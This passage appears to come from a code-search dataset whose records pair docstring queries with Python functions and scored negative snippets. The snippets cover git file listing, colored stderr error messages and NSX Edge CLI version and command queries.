= '<a href=\"(.*)\" class=\"c-3\">'\n break_link = '<a href=\"(.*)\" class=\"c-6\">'\n model_name = 'class=\"c-3\">(.*)</a>'\n if re.search(break_link, each_link):\n break\n result_link = re.findall(model_link, each_link)\n result_name = re.findall(model_name, each_link)\n# print len(result_link), len(result_name)\n if len(result_link) > 0:\n if len(result_name) > 0:\n print >> match, result_link[0]+' '+result_name[0]\n counter += 1\n print \"All the avaliable links is: \", counter" ]
[ "0.7142194", "0.6892841", "0.6824566", "0.66558737", "0.65821356", "0.6506589", "0.64602387", "0.62871546", "0.6197151", "0.61179537", "0.61167383", "0.6051518", "0.60359395", "0.6032119", "0.60204184", "0.60023904", "0.6000569", "0.5965327", "0.5958277", "0.595405", "0.59110785", "0.5902549", "0.58965117", "0.58941025", "0.58327085", "0.57936734", "0.5768031", "0.5747843", "0.5741024", "0.5731105" ]
0.74561816
0
Run ``git lsfiles`` in the toplevel project directory. Arguments go directly to execution call.
def git_ls_files(*cmd_args): cmd = ['git', 'ls-files'] cmd.extend(cmd_args) return set(subprocess.check_output(cmd).splitlines())
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def git_ls_files():\n\tproc = subprocess.Popen(\n\t\t['git', 'ls-files'],\n\t\tstdin=subprocess.DEVNULL,\n\t\tstdout=subprocess.PIPE,\n\t\tstderr=None\n\t)\n\t(stdout, stderr) = proc.communicate()\n\tif proc.returncode != 0:\n\t\traise OSError(\"Cannot list version-controlled files\")\n\tfilenames = stdout.decode().split()\n\treturn list(filter(is_regular_file, filenames))", "def _ls(options, *files):\n if len(files) == 0:\n args = os.curdir\n else:\n args = ' '.join(files)\n subprocess.Popen('ls %s %s' % (options, args), shell=True)", "def ls(*files):\n _ls('-aF', *files)", "def git_callback(files): # type: (t.List[t.Tuple[str, str]]) -> None\n for dirpath, _dirnames, filenames in os.walk(os.path.join(data_context().content.root, '.git')):\n paths = [os.path.join(dirpath, filename) for filename in filenames]\n files.extend((path, os.path.relpath(path, data_context().content.root)) for path in paths)", "def do_ls(self, args):\n logger.debug(\"do_ls() was called\")\n \n parser = CrispyArgumentParser(description=self.do_ls.__doc__, prog=\"ls\")\n\n try:\n pargs = parser.parse_args(shlex.split(args))\n if pargs:\n print \"\\nDirectory listing:\\n===================\"\n for f in os.listdir(os.getcwd()):\n print \"{}\".format(f)\n fprint.success(\"Done.\")\n except MyParserException as e:\n print e", "def ll(*files):\n _ls('-alF', *files)", "def do_ls(argv):\n subprocess.call(\"ls\")", "def do_ls(self, args):\n if args:\n args = args.split()\n\n try:\n for file_name in self._qm.list_files(self._user):\n if not args:\n print(file_name)\n else:\n for a in args:\n if fnmatch.fnmatch(file_name, a):\n print(file_name)\n break\n except Exception, ex:\n print('ERROR:', ex, file=sys.stderr)", "def _find_git_files(dirname='', git_dir=None):\n file_list = []\n if git_dir is None:\n git_dir = pbr.git._run_git_functions()\n if git_dir:\n file_list = pbr.git._run_git_command(['ls-files', '-z'], git_dir)\n file_list += pbr.git._run_git_command(\n ['submodule', 'foreach', '--quiet', 'ls-files', '-z'],\n git_dir\n )\n # Users can fix utf8 issues locally with a single commit, so we are\n # strict here.\n file_list = file_list.split(b'\\x00'.decode('utf-8'))\n submodules = _get_submodules(git_dir)\n return [f for f in file_list if f and f not in submodules]", "def fs_ls(self, src):\n cmd = (\n \"import uos\\nfor f in uos.ilistdir(%s):\\n\"\n \" print('{:12} {}{}'.format(f[3]if len(f)>3 else 0,f[0],'/'if f[1]&0x4000 else ''))\"\n % ((\"'%s'\" % src) if src else \"\")\n )\n self.exec_(cmd, data_consumer=stdout_write_bytes)", "def get_files_from_git() -> Sequence[Path]:\n\n def get_files(cmd: str) -> Sequence[str]:\n output = subprocess.check_output(cmd, shell=True)\n return [os.fsdecode(x) for x in output.splitlines()]\n\n root = os.fsdecode(subprocess.check_output(\"git rev-parse --show-toplevel\", shell=True).strip())\n result: Set[str] = set()\n result.update(get_files(\"git diff --name-only --diff-filter=ACM --staged\"))\n result.update(get_files(\"git diff --name-only --diff-filter=ACM\"))\n result.update(get_files(\"git ls-files -o --full-name --exclude-standard\"))\n return sorted(Path(root, x) for x in result)", "def git(*args):\n return subprocess.check_output([\"git\"] +\n list(args)).decode(\"utf-8\").strip().split(\"\\n\")", "def git(self, *args, **kwargs):\n retv = list()\n command = list()\n command.append(self.which('git'))\n # pylint: disable=W0106\n [command.append(x) for x in args]\n # pylint: enable=W0106\n\n cmd_args = {'stderr': subprocess.STDOUT, 'stdout': subprocess.PIPE}\n for kname, kvalue in kwargs.items():\n cmd_args[kname] = kvalue\n\n process = subprocess.Popen(command, **cmd_args)\n stdoutdata, stderrdata = process.communicate()\n if len(stdoutdata.strip()) > 0:\n for line in stdoutdata.split('\\n'):\n line = line.strip('\\n')\n log.debug(line)\n retv.append(line)\n returncode = process.returncode\n\n if returncode == 0:\n return retv\n\n raise GLToolsException(\"%s\\n\\n%s\" % (stderrdata, stdoutdata))", "def gitopen(args, git_tree=None):\n\n returncode = None\n output = None\n\n if git_tree is not None:\n cmd = [_git_path, \"--work-tree=%s\" % git_tree, \"--git-dir=%s\" % get_git_dir(git_tree)] + args\n else:\n cmd = [_git_path] + args\n\n env = os.environ.copy()\n env['LC_ALL'] = 'en_US'\n\n if _PLATFORM == \"windows\":\n startupinfo = subprocess.STARTUPINFO()\n startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW\n process = subprocess.Popen(\n cmd,\n startupinfo=startupinfo,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n stdin=subprocess.PIPE,\n shell=False,\n env=env\n )\n else:\n process = subprocess.Popen(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n stdin=subprocess.PIPE,\n shell=False,\n env=env\n )\n output = process.communicate()\n returncode = process.returncode\n\n assert returncode == 0, \"Runtime Error: %s\" % output[0].rstrip()\n\n return output[0]", "def get_files_changed():\n files_list = []\n test = os.popen('git show --name-only')\n repo_location = os.popen('git rev-parse --show-toplevel')\n repo_location = repo_location.readlines()\n repo_location = repo_location[0]\n repo_location = repo_location.replace('\\n', '')\n if \"Not a git repository\" in repo_location:\n files_list.append(\"Not a git repository\")\n return files_list\n files_list.append(repo_location.split('/')[-1])\n output = test.readlines()\n for a in range(6, len(output)):\n files_list.append(output[a].replace('\\n', ''))\n return files_list", "def ls(commandList, rootDir, posixfinder):\n\n HIDDEN_FILES = False\n TIME_FILES = False\n USER_FILES = False\n SIZE_FILES = False\n TYPE_FILES = False\n HELP_REQUEST = False\n\n hidden = {'.idea', 'help.txt', 'INFO.txt', 'venv', '__pycache__', '__init__', '.git'}\n if len(commandList) == 1:\n # default ls configuration\n print('File names: ')\n for i in os.listdir():\n if i not in hidden:\n print(i)\n continue\n else:\n wrongList = []\n commandListFinal = []\n errorOption = None\n done = False\n # checks for options\n for option in commandList:\n if option == '-u':\n USER_FILES = True\n commandListFinal.append(option)\n elif option == '-t':\n TIME_FILES = True\n commandListFinal.append(option)\n elif option == '-h':\n HIDDEN_FILES = True\n commandListFinal.append(option)\n elif option == '-s':\n SIZE_FILES = True\n commandListFinal.append(option)\n elif option == '-c':\n TYPE_FILES = True\n commandListFinal.append(option)\n elif option == '-a':\n HIDDEN_FILES = True\n TIME_FILES = True\n USER_FILES = True\n SIZE_FILES = True\n TYPE_FILES = True\n commandListFinal.append(option)\n elif option == '--help':\n HELP_REQUEST = True\n commandListFinal.append(option)\n break\n elif option == 'ls':\n commandListFinal.append(option)\n continue\n else:\n errorOption = option\n commandListFinal.append(option)\n break\n if errorOption is not None and errorOption[0] != '-':\n try:\n os.listdir(errorOption.replace('*', rootDir))\n\n return confop(timeFiles=TIME_FILES, hiddenFiles=HIDDEN_FILES, userFiles=USER_FILES,\n sizeFiles=SIZE_FILES,\n typeFiles=TYPE_FILES, hiddenFilesA=hidden,\n customDir=errorOption, rootDir=rootDir, posixfinder=posixfinder)\n except OSError:\n return print(': '.join(commandListFinal) + ': not a directory or option for ls, '\n 'type ls --help for usage')\n\n if errorOption is not None and errorOption[0] == '-':\n for h in commandList:\n if h == errorOption:\n wrongList.append(h)\n return print(f\"{': '.join(wrongList)}: unexpected option, type ls --help for usage\")\n else:\n wrongList.append(h)\n continue\n if HELP_REQUEST:\n with open(f'{rootDir}/doc/lsdoc.txt' if posixfinder else f'{rootDir}\\\\doc\\\\lsdoc.txt') as f:\n return print(f.read())\n\n # Time last modified: | User of files: | Size of files: | Type: | Hidden: | File names:\n\n if not done:\n confop(timeFiles=TIME_FILES, hiddenFiles=HIDDEN_FILES, userFiles=USER_FILES, sizeFiles=SIZE_FILES,\n typeFiles=TYPE_FILES, hiddenFilesA=hidden,\n customDir=None, rootDir=rootDir, posixfinder=posixfinder)\n return None", "def ls():", "def main(self, *directories):\n if not self.git and len(directories) == 0:\n print (\"ERROR: At least one directory must be provided (or the \"\n \"--git-precommit flag must be passed.\\n\")\n self.help()\n return\n\n if len(directories) > 0:\n find = local['find']\n files = []\n for directory in directories:\n real = os.path.expanduser(directory)\n if not os.path.exists(real):\n raise ValueError(\"{0} does not exist\".format(directory))\n files.extend(find(real, '-not', '-name', '._*', '-name', '*.py').strip().split('\\n'))\n else:\n status = local['git']('status', '--porcelain', '-uno')\n root = local['git']('rev-parse', '--show-toplevel').strip()\n\n # get all modified or added python files\n modified = re.findall(r\"^\\s[AM]\\s+(\\S+\\.py)$\", status, re.MULTILINE)\n\n # now just get the path part, which all should be relative to the\n # root\n files = [os.path.join(root, line.split(' ', 1)[-1].strip())\n for line in modified]\n\n if len(files) > 0:\n print \"Linting {0} python files.\\n\".format(len(files))\n lint(files)\n else:\n print \"No python files found to lint.\\n\"", "def git_ls_tree(branch: str = 'main'):\n branch = quote(branch)\n return f\"git ls-tree -r {branch} --name-only\"", "def list_(ctx: click.Context, repository_path):\n root_commands.cmd_list(ctx.obj, repository_path)", "def cli_ls(parser):\n subparser = argparse.ArgumentParser(\n description='List files on a vault (default is drop.jarvice.com)',\n parents=[parser])\n\n subparser.add_argument('-store',\n default='drop.jarvice.com',\n help='Remote vault name')\n subparser.add_argument('-directory',\n default='.',\n help='Remote directory name')\n\n args = subparser.parse_args()\n result = utils.ls(config['username'], config['apikey'],\n args.store, args.directory)\n for i in result:\n print(i)", "def list_files(directories):\n return exec_fn(lambda: _list_dir(directories))", "def execute(self, *args):\n default_params = [\"git\", \"-C\", self.basePath]\n all_params = default_params + list(args)\n subprocess.call(all_params, stdout=open(self.logPath, 'a'), stderr=open(self.logPath, 'a'))", "def listfiles(self, *args, **kwargs):\n recursive = kwargs.get(\"recursive\", True)\n self._download_server_info()\n if self._info:\n return [a for a in self._info.keys() if _is_prefix(args, a)]\n text = self._open(*args).text\n parser = _FindLinksParser()\n parser.feed(text)\n links = parser.links\n files = [args + (f,) for f in links if not f.endswith(\"/\") and not f.endswith(\".info\")]\n if recursive:\n for f in links:\n if f.endswith(\"/\"):\n f = f.strip(\"/\")\n nargs = args + (f,)\n files.extend([a for a in self.listfiles(*nargs, recursive=True)])\n return files", "def main_list(args):\n return list_commands(args.directory)", "def checkGit(directory):", "def git_status(c):\n c.run(\"git submodule foreach git status\")", "def __gitSubmodulesList(self):\n self.vcs.gitSubmoduleList(self.project.getProjectPath())", "def git(ctx, commands):\n\n # create local copies of ctx vaiables for easy access\n gitCommand = ctx.obj[\"gitCommand\"]\n\n system(gitCommand + \" \".join(commands))", "def ls(path, filter=None):" ]
[ "0.7529486", "0.6684709", "0.66222614", "0.6546617", "0.63417643", "0.63115054", "0.62302166", "0.61532456", "0.61515826", "0.60766083", "0.60619664", "0.60407776", "0.6007652", "0.5975857", "0.59522355", "0.58336353", "0.5823643", "0.5823149", "0.58227754", "0.5755018", "0.5753638", "0.5730833", "0.5722453", "0.5645064", "0.5622107", "0.5560811", "0.5533176", "0.5507636", "0.54927814", "0.54850554" ]
0.7539438
0
Print a message indicating failure in red color to STDERR.
def print_failure_message(message): try: import colorama print(colorama.Fore.RED + message + colorama.Fore.RESET, file=sys.stderr) except ImportError: print(message, file=sys.stderr)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def err(msg):\n print(colored.red(\"[ERROR]: {0}\".format(msg)))", "def print_error(message: str):\n print_with_color(message, constant.Color.FAIL)", "def print_failure_msg(msg):\n click.secho(msg, fg='red', file=sys.stderr)", "def failure(self, message=''):\n print(colored(message, 'red'))", "def print_error(message):\n from sys import stderr\n print(\"\\033[1;31;40m \" + message + \"\\033[0;37;40m\", file=stderr)", "def error(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def print_failure(text):\n\n print(colorize(text, Colors.FAIL))", "def msg_err(message):\n to_stdout(\" !!! {message}\".format(message=message), colorf=red, bold=True)\n if _logger:\n _logger.error(message)", "def print_failure(msg):\n\n tf.print(BColors.FAIL + msg + BColors.ENDC, output_stream=sys.stderr)\n sys.exit(1)", "def error_message(message='Ops, there are some error...'):\n print(colorful_text(message, Fore.RED))", "def fail():\n sys.stdout.write('%s[ fail ]%s\\n' % (colors.RED, colors.RESET))", "def color_print(message, color, newline='\\n'):\n sys.stderr.write('%s%s%s%s' % (color, message, ANSI_NORMAL, newline))", "def error(message):\n if DEBUG:\n with print_lock:\n print((Colours.FAIL + 'ERROR: ' + Colours.END_COLOUR + message).strip())", "def error(msg):\n sys.stdout.write('%s[ ERROR ]%s %s\\n' % (colors.RED, colors.RESET, msg))", "def error(message):\n global LAST_LOG\n LAST_LOG = message\n cprint('\\r[ERR] {0}'.format(message), 'red', file=sys.stderr)", "def print_err(*vargs, **kwargs):\n _do_print_color(*vargs, colorcode = 31, **kwargs)", "def error(msg, *args):\n if args:\n msg %= args\n click.echo(click.style(msg, fg='red', bold=True), file=sys.stderr)", "def error(msg):\n click.secho(f'[ERROR] {msg}', fg='red')", "def command_failed_error(cmd):\n\n output_1 = colored(' - Error: Failed to run command ', 'red')\n output_2 = command(cmd)\n return output_1 + output_2 + '\\n'", "def printerr(msg):\n print(msg, file=sys.stderr)", "def print_err(msg):\n print(msg, file=sys.stderr)", "def error(name=None, msg=None, lineno=None):\n if name is not None:\n if error_color:\n print(\"\\033[31;1;4mError:\\033[0m %s\" % name, file=sys.stderr)\n else:\n print(\"Error: %s\" % name, file=sys.stderr)\n if msg is not None:\n print(msg, file=sys.stderr)\n if lineno is not None:\n if error_color:\n print(\"\\033[32;1;4mLine Number:\\033[0m %d\" % int(lineno),\n file=sys.stderr)\n\n else:\n print(\"Line Number: %d\" % int(lineno),\n file=sys.stderr)\n sys.exit(1)", "def printerr(message):\n sys.stderr.write('{}\\n'.format(message))\n sys.stderr.flush()", "def error(message):\n print(message, file=sys.stderr)", "def error(message, exits=None): # pylint: disable=unused-argument\n print(crayons.red(fmt(message, \"[✗]\"), bold=True))\n sys.stdout.flush()", "def style_error(msg='{}'):\n red_code = '\\033[0;31m'\n return text_color(msg, red_code)", "def errprint(msg):\n\n print('!! *** ERROR: %s' % msg)", "def print_error(*args):\n print_message_with_title('ERROR', *args, c1='r', c2=None, style='b')", "def _print_error(message):\n sys.stderr.write(str(message) + \"\\n\")\n sys.stderr.flush()", "def eprint(errmsg):\n print(errmsg, file=STDERR)" ]
[ "0.8139798", "0.7891391", "0.7861315", "0.7850614", "0.7619812", "0.7606152", "0.760484", "0.75479156", "0.75395614", "0.74183655", "0.7407587", "0.73441464", "0.72732544", "0.72718126", "0.7205987", "0.71278733", "0.71020126", "0.706107", "0.7059658", "0.696329", "0.6958461", "0.6946168", "0.6945375", "0.694178", "0.6878918", "0.68595564", "0.68553483", "0.67925197", "0.6777555", "0.6766789" ]
0.8332692
0
Returns the Kernel version, Build number, Name and Version information for given NSX edge NSXEdge>show version
def get_os_info(cls, client_object, **kwargs): endpoint = "show version " PARSER = "raw/showEdgeVersion" EXPECT_PROMPT = ['bytes*', 'NSXEdge>'] # Get the parsed data mapped_pydict = utilities.get_mapped_pydict_for_expect( client_object.connection, endpoint, PARSER, EXPECT_PROMPT, ' ') # Close the expect connection object client_object.connection.close() get_edge_version_schema_object = show_edge_version_schema. \ ShowEdgeVersionSchema(mapped_pydict) pylogger.info("show version command output : %s" % get_edge_version_schema_object.__dict__) return get_edge_version_schema_object
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_version(self):\n verxml = self._ncc.nxoscli('show version')\n self.logger.debug(verxml)\n verparsed = _begin_parse(verxml)\n sysmgrclischema = parse_get_nsmap(verparsed)\n self.logger.debug(\"NSMAP: {}\".format(sysmgrclischema))\n showversion = find_element(['sys_ver_str', 'chassis_id', 'host_name', 'loader_ver_str'], sysmgrclischema,\n verparsed)\n self.logger.debug(str(showversion))\n self.hostname = showversion['host_name']\n self.chassis_id = showversion['chassis_id']\n self.system_version = showversion['sys_ver_str']", "def version(self):\n done, data = self._request('GV')\n if done:\n return {\n 'firmware': data[0],\n 'protocol': data[1]\n }\n\n raise EvseError", "def build_version(self):\n return self.nodes[0].get('infos').get('system_info').get('system_version')", "def show_versions():\n sys_info = _get_sys_info()\n deps_info = _get_deps_info()\n\n print(\"\\nSystem:\")\n for k, stat in sys_info.items():\n print(\"{k:>10}: {stat}\".format(k=k, stat=stat))\n\n print(\"\\nPython dependencies:\")\n for k, stat in deps_info.items():\n print(\"{k:>13}: {stat}\".format(k=k, stat=stat))", "def show_version():\n print(\"===============================================================\")\n print(f\"Productivity App v{__VERSION__}\")\n print(f\"Made by {__AUTHOR__} (with the advices of {__ADVISOR__})\")\n print(\"Source : https://github.com/Ilade-s/productivite-app-TkVer\")\n print(\"Server (optionnal) : https://github.com/Tifiloow/productivite-app\")\n print(\"Assets : https://feathericons.com/\")\n print(\"===============================================================\")", "def get_version(ip):\n url='http://{}/ins'.format(ip)\n\n myheaders={'content-type':'application/json'}\n payload={\n \"ins_api\": {\n \"version\": \"1.0\",\n \"type\": \"cli_show\",\n \"chunk\": \"0\",\n \"sid\": \"1\",\n \"input\": \"show version\",\n \"output_format\": \"json\"\n }\n }\n response = requests.post(url,data=json.dumps(payload), headers=myheaders,auth=(nxos_username,nxos_password))\n resp = response.json()['ins_api']['outputs']['output']['body']['kickstart_ver_str']\n return resp", "def read_versionInfo(self):\n # PROTECTED REGION ID(SdpMasterLeafNode.versionInfo_read) ENABLED START #\n return self.attr_map[\"versionInfo\"]\n # PROTECTED REGION END # // SdpMasterLeafNode.versionInfo_read", "def xnvme_ver(cml_path=None):\n\n if cml_path is None:\n cml_path = os.sep.join([\"..\", \"..\", \"CMakeLists.txt\"])\n\n with open(cml_path) as cmake:\n for line in cmake.readlines():\n if \"\\tVERSION \" not in line:\n continue\n\n _, vtxt = line.split(\"VERSION \", 1)\n\n return vtxt.strip()\n\n return \"\"", "def show_version():\n terminal.echo(f\"{package_metadata['name']} {package_metadata['version']}\")", "def version(ctx):\n print(VERSION)", "def __getSuSEVersion(self):\n linuxVendor = \"SuSE\"\n linuxRelease, resultErr = self.ksp_ssh.ssh_execute_command(\n \"grep 'VERSION' /etc/SuSE-release | cut -d= -f2 | tr -d ' \\n'\")\n return linuxVendor.strip(), linuxRelease.strip()", "def driver_version(self):\n data = fcntl.ioctl(self._fd, _EVIOCGVERSION, '\\x00\\x00\\x00\\x00')\n return struct.unpack(\"i\", data)[0]", "def version():\n\n print(VERSION_CODE)", "def print_version(_args):\n print(__version__)", "def show_versions():\n sys_info = _get_sys_info()\n versions = _get_autogluon_versions()\n sorted_keys = sorted(versions.keys(), key=lambda x: x.lower())\n\n maxlen = 0 if len(versions) == 0 else max(len(x) for x in versions)\n print(\"\\nINSTALLED VERSIONS\")\n print(\"------------------\")\n for k, v in sys_info.items():\n print(f\"{k:<{maxlen}}: {v}\")\n print(\"\")\n for k in sorted_keys:\n print(f\"{k:<{maxlen}}: {versions[k]}\")", "def get_version_info(self):\n return self._jadeRpc('get_version_info')", "def do_version(self, a):\n print(\"\\tversion: \" + (str(ise.getVersion())) +\n \".\" + (str(ise.getFirmware())))", "def get_version_info():\n out = \"\\nmpsyt version : %s \" % __version__\n out += \"\\n notes : %s\" % __notes__\n out += \"\\npafy version : %s\" % pafy.__version__\n out += \"\\nPython version : %s\" % sys.version\n out += \"\\nProcessor : %s\" % platform.processor()\n out += \"\\nMachine type : %s\" % platform.machine()\n out += \"\\nArchitecture : %s, %s\" % platform.architecture()\n out += \"\\nPlatform : %s\" % platform.platform()\n out += \"\\nsys.stdout.enc : %s\" % sys.stdout.encoding\n out += \"\\ndefault enc : %s\" % sys.getdefaultencoding()\n out += \"\\nConfig dir : %s\" % get_config_dir()\n envs = \"TERM SHELL LANG LANGUAGE\".split()\n\n for env in envs:\n value = os.environ.get(env)\n out += \"\\nenv:%-11s: %s\" % (env, value) if value else \"\"\n\n return out", "def gather_metric(self):\n result = self._shell.run(self.FASTBOOT_COMMAND)\n # If '--version' flag isn't recognized, will print to stderr\n if result.stderr:\n version = self.FASTBOOT_ERROR_MESSAGE\n else:\n # The version is the last token on the first line\n version = result.stdout.splitlines()[0].split()[-1]\n\n response = {self.FASTBOOT_VERSION: version}\n return response", "def show_versions():\n\n print(\n f\"Version info: \"\n f\"autodoc_pydantic: {get_version('sphinxcontrib.autodoc_pydantic')} | \"\n f\"pydantic: {get_version_special('pydantic')} | \"\n f\"sphinx: {get_version('sphinx')} | \"\n f\"sphinx_rtd_theme: {get_version('sphinx_rtd_theme')} | \"\n f\"sphinx_tabs: {get_version('sphinx_tabs')}\")", "def GetVersion(*args, **kwargs):\n return _gdi_.RendererNative_GetVersion(*args, **kwargs)", "def cli_show_version(ctx, _, value):\n if not value or ctx.resilient_parsing:\n return\n\n show_versions()\n\n ctx.exit()", "def show_version(ctx, param, value):\n if not value or ctx.resilient_parsing:\n return\n click.echo('Zap AppImage utility')\n click.echo('version: {}'.format(__version__))\n ctx.exit()", "def get_ver(self, bootdefault):\n module = 'version/oper'\n method = 'GET'\n response = self.axapi_call(module, method)\n installedver = response.json()['version']['oper'][bootdefault]\n print(self.device + ' The version currently installed on ' + bootdefault + ' is: ' + installedver)", "def version():\n\tsys.stdout.write (\"NodeAutoInstall version %s\" % _VERSION)\n\tsys.stdout.write (\" (running on %s %s)\\n\" % (platform.system() , platform.machine()))", "def version(silent=False):\n if silent is False:\n print(\n \"- OS: \" + platform.system(),\n \"(\" + platform.architecture()[1] + \" \" + platform.architecture()[0] + \")\",\n \"\\n- Python: \" + platform.python_version(),\n \"\\n- NeuroKit2: \" + __version__,\n \"\\n\\n- NumPy: \" + np.__version__,\n \"\\n- Pandas: \" + pd.__version__,\n \"\\n- SciPy: \" + scipy.__version__,\n \"\\n- sklearn: \" + sklearn.__version__,\n \"\\n- matplotlib: \" + matplotlib.__version__,\n )\n else:\n return __version__", "def read_fw_version(self):\n\n # This function expects the firmware version to be in a line\n # prefixed with 'Product Extra'.\n # At the moment, it takes the form:\n # Product Extra : MCH FW V2.18.8 Final (r14042) (Mar 31 2017 - 11:29)\n # The following two parts will be extracted:\n # mch_fw_ver: V2.18.8 Final\n # mch_fw_date: Mar 31 2017 - 11:29\n # If NAT change the format, then this function will need to be updated\n\n pattern = \".*: MCH FW (.*) \\(.*\\) \\((.*)\\)\"\n\n for mch in range(1,3):\n try:\n result = self.mch_comms.call_ipmitool_command([\"fru\", \"print\", str(mch + MCH_FRU_ID_OFFSET)])\n\n for line in result.splitlines():\n if FW_TAG in line:\n match = re.match(pattern, line)\n if match:\n self.mch_fw_ver[mch] = match.group(1)\n self.mch_fw_date[mch] = match.group(2)\n else:\n self.mch_fw_ver[mch] = \"Unknown\"\n self.mch_fw_date[mch] = \"Unknown\"\n except CalledProcessError as e:\n self.mch_fw_ver[mch] = \"Unknown\"\n self.mch_fw_date[mch] = \"Unknown\"\n except TimeoutExpired as e:\n print(\"read_fw_version: caught TimeoutExpired exception: {}\".format(e))", "def version():\n click.echo(u'shellfoundry version ' + pkg_resources.get_distribution(u'shellfoundry').version)", "def get_dpdk_version(node):\n command = f\"cat {Constants.REMOTE_FW_DIR}/dpdk*/VERSION\"\n message = u\"Get DPDK version failed!\"\n stdout, _ = exec_cmd_no_error(node, command, message=message)\n # TODO: PAL should already tolerate stripped value in the log.\n logger.info(f\"DPDK Version: {stdout}\")\n return stdout.strip()", "def sys_info(self):\n\n for i in self._nodes.items():\n print(\"\\n==============================\")\n name = i[0]\n node = i[1]\n\n print(\"NODE: {}\\n\".format(name))\n\n # CPU\n print(\"CPU:\")\n self.cpu_info(node)\n\n # Grub\n print(\"\\nGrub Command Line:\")\n if \"grub\" in node:\n print(\" Current: {}\".format(node[\"grub\"][\"current_cmdline\"]))\n print(\" Configured: {}\".format(node[\"grub\"][\"default_cmdline\"]))\n\n # Huge Pages\n print(\"\\nHuge Pages:\")\n self.hugepage_info(node)\n\n # Devices\n print(\"\\nDevices:\")\n self.device_info(node)\n\n # Status\n print(\"\\nVPP Service Status:\")\n state, errors = VPPUtil.status(node)\n print(\" {}\".format(state))\n for e in errors:\n print(\" {}\".format(e))\n\n # Minimum system resources\n self.min_system_resources(node)\n\n print(\"\\n==============================\")" ]
[ "0.6694532", "0.61063725", "0.59893906", "0.58265644", "0.581532", "0.581229", "0.56937516", "0.56883925", "0.5680113", "0.56638014", "0.5618403", "0.5599922", "0.55912185", "0.55906004", "0.55780494", "0.5560827", "0.5550261", "0.5543873", "0.55412424", "0.5535596", "0.55161715", "0.55075586", "0.55007994", "0.5496112", "0.54885167", "0.54833627", "0.54733217", "0.5459852", "0.54469204", "0.54331285" ]
0.7000498
0
Logs in to given NSX edge in configure terminal mode and fetch the list of all supported commands. Returns the list of commands in a pyset object. Refer /VDNetLib/TestData/Edge/list_command_configure_mode for output format
def get_all_supported_commands_configure_mode(cls, client_object, **kwargs): pydict = dict() try: if "password" in kwargs: pwd = kwargs["password"] pylogger.info("trying to create an expect connection " "with %s" % pwd) else: pwd = constants.VSMterms.PASSWORD # Execute the command on the Edge VM expect_condition, command_output = client_object.connection.\ execute_command_in_configure_terminal("list", ['#'], enable_password=pwd) except: # Close the expect connection object client_object.connection.close() pydict['result'] = False return pydict # Close the expect connection object client_object.connection.close() error_occured = command_output.find('Error') if expect_condition == 0: # expecting the '#' prompt if error_occured == -1: pylogger.info("Successfully listing configure mode commands") lines = command_output.split("\n") lines = [i.strip() for i in lines] if "NSXEdge(config)" in lines: lines.remove("NSXEdge(config)") pydict['supported_commands'] = set(lines) return pydict else: raise RuntimeError("Unable to list config mode commands") else: raise RuntimeError("Unable to establish expect connection")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_all_supported_commands_enable_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'],\n password=password)\n\n else:\n # Execute the command on the Edge VM\n expect_condition, command_output = client_object.connection.\\\n execute_command_in_enable_terminal(\"list\", ['#'])\n\n except:\n # Close the expect connection object\n client_object.connection.close()\n\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if expect_condition == 0: # expecting the '#' prompt\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing enable mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list enable mode commands\")\n else:\n pydict['result'] = False\n return pydict", "def get_all_supported_commands_admin_mode(\n cls, client_object, **kwargs):\n pydict = dict()\n EXPECT_PROMPT = ['bytes*', 'NSXEdge>']\n\n try:\n if \"password\" in kwargs:\n password = kwargs[\"password\"]\n pylogger.info(\"trying to create an expect connection \"\n \"with %s\" % password)\n\n client_object.password = password\n\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n else:\n # Execute the command on the Edge VM\n command_output = client_object.connection.\\\n request(\"list\", EXPECT_PROMPT).response_data\n\n except:\n pydict['result'] = False\n return pydict\n\n # Close the expect connection object\n client_object.connection.close()\n\n # Fetching the Error string if any\n error_occured = command_output.find('Error')\n\n if error_occured == -1:\n\n pylogger.info(\"Successfully listing admin mode commands\")\n lines = command_output.strip().split(\"\\n\")\n lines = [i.strip() for i in lines]\n if \"NSXEdge\" in lines:\n lines.remove(\"NSXEdge\")\n\n pydict['supported_commands'] = set(lines)\n return pydict\n else:\n raise RuntimeError(\"Unable to list admin mode commands\")", "def list_commands(self) -> dict[str, str] | None:\n try:\n return cast(dict[str, str], self._client.list_commands(self._alias))\n except PyNUTError as err:\n _LOGGER.error(\"Error retrieving supported commands %s\", err)\n return None", "def list_commands(self):\n response = self.do_command('list_commands')\n stripped = [s for s in (t.strip() for t in response.split(\"\\n\"))]\n return [s for s in stripped if is_well_formed_gtp_word(s)]", "def getCommandList(self):\n return self.commands.keys()", "def getCommands(self):", "def get_commands_list() -> list:\n return open(\"data/metadata/commands.list.txt\", \"r\").read().split(\"\\n\")", "def get_commands(self):\n return list(self.commands.values())", "def list_commands(self, ctx):\n return self.daemon.list_actions()", "def setup_commands(self):\n return self.get_data(\"setup_commands\")", "def _get_commands(self) -> list:\n return [i[1] for i in inspect.getmembers(self, predicate=lambda i: hasattr(i, \"is_cmd\"))]", "def list_commands(self, ctx):\n commands = self._iter_commands()\n return commands.keys()", "def commands(self) -> List[Command]:\n return []", "def do_list_commands(self):\n result = 